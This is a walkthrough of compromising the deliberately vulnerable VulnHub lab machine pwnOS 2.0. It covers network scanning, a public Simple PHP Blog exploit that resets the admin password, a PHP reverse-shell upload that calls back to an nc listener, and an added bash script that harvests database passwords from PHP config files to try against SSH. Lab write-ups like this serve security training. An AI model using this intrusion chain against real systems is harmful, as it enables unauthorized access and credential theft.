pwnOS 2.0
Setup
Attacker (Kali): 10.10.10.128
VulnHub Link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
VM Network: VMnet3 (Custom)
Enumeration
Host Enumeration
Use arp-scan to find the VM's IP address: sudo arp-scan -l
The box's IP is 10.10.10.100
Port Enumeration
Perform a quick port enumeration with rustscan: rustscan -a 10.10.10.100
Full scan with nmap: nmap -A -p- 10.10.10.100 -oN nmap.txt
# Nmap 7.93 scan initiated Tue May 2 19:45:29 2023 as: nmap -A -p- -oN nmap.txt 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85d32b0109427b204e30036dd18f95ff (DSA)
| 2048 307a319a1bb817e715df89920ecd5828 (RSA)
|_ 256 1012644b7dff6a87372638b1449fcf5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 2 19:45:38 2023 -- 1 IP address (1 host up) scanned in 9.92 seconds
Directory Enumeration
Use gobuster to perform a directory brute force: gobuster dir -u http://10.10.10.100 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
http://10.10.10.100/index
http://10.10.10.100/info
http://10.10.10.100/login
http://10.10.10.100/register
http://10.10.10.100/includes/
http://10.10.10.100/blog/
Checking the pages, /info turns out to be a phpinfo page:
And there is a blog available at /blog:
Foothold
The blog's version is visible in the page source (view-source): it is Simple PHP Blog 0.4.0:
Check whether there are any public exploits: searchsploit simple php blog 0.4.0
To avoid Metasploit, I copy 1191.pl out with the command searchsploit -m 1191
Running the script may fail with an error about a missing Perl module (Switch); it can be fixed with the following command:
sudo apt-get install libswitch-perl
After fixing that, run the script again to see its usage:
Run the following command to set the admin user's password (here to admin):
./1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin
Log in to /blog and use Upload Image to upload a PHP reverse shell:
Uploaded files land in /blog/images:
Set up a listener with nc on Kali: nc -lvnp 5555
Then click php-reverse-shell.php and the reverse shell comes back:
Privilege Escalation
I found the MySQL root password in /var/www/mysqli_connect.php:
Trying it against SSH fails:
But there is another password in /var/mysqli_connect.php:
And that one works for SSH login:
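The privilege escalation above comes down to finding database credentials in PHP config files and trying each one against SSH. The following shell script is an added example (not part of the original writeup) that automates the credential hunt: it walks a directory tree, pulls DB_USER/DB_PASSWORD out of every PHP file that defines them, and prints each distinct password once. The two mysqli_connect.php files it builds under a temporary directory are constructed samples with placeholder values, not the contents of the box's real files; the IP in the closing comment is the one from this writeup.

```bash
#!/usr/bin/env bash
# Added example: hunt for DB credentials in PHP config files after
# landing a web shell, then list each distinct password once so it can
# be tried against SSH. Sample files below are constructed placeholders.
set -eu

# Build a constructed sample tree that mimics /var and /var/www.
# $1 = scratch directory to populate.
make_sample_tree() {
  mkdir -p "$1/var/www"
  cat > "$1/var/www/mysqli_connect.php" <<'EOF'
<?php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'sample_web_pass');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'blog');
?>
EOF
  cat > "$1/var/mysqli_connect.php" <<'EOF'
<?php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'sample_other_pass');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'blog');
?>
EOF
}

# Print the value of a PHP define() constant from a file.
# $1 = file, $2 = constant name. Accepts DEFINE/define and either quote style.
php_define() {
  sed -nE "s/.*[Dd][Ee][Ff][Ii][Nn][Ee][[:space:]]*\([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1/p" "$1" | head -n1
}

# Print "file:user:password" for every PHP file under the given roots
# that defines a DB_PASSWORD.
find_db_creds() {
  find "$@" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
    user=$(php_define "$f" DB_USER)
    pass=$(php_define "$f" DB_PASSWORD)
    if [ -n "$pass" ]; then
      printf '%s:%s:%s\n' "$f" "${user:-?}" "$pass"
    fi
  done
}

# Distinct passwords only, in the order they were found.
candidate_passwords() {
  find_db_creds "$@" | cut -d: -f3- | awk '!seen[$0]++'
}

# Demo on the constructed sample tree.
tmp=$(mktemp -d)
make_sample_tree "$tmp"
echo "== credentials found =="
find_db_creds "$tmp/var"
echo "== passwords to try against SSH =="
candidate_passwords "$tmp/var"
rm -rf "$tmp"

# On the real box, once you have a shell, the same functions would be
# run as: find_db_creds /var /etc /opt /home
# and each password tried with something like: ssh root@10.10.10.100
```

Note that the second config file lives outside the web root (/var rather than /var/www), which is why a search limited to the web root misses it; search from the broadest parent you can read.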
Finally
There is no flag in this box. You get root, You win.
It's an easy box, but it's worth coming back to later to look for other ways to get root.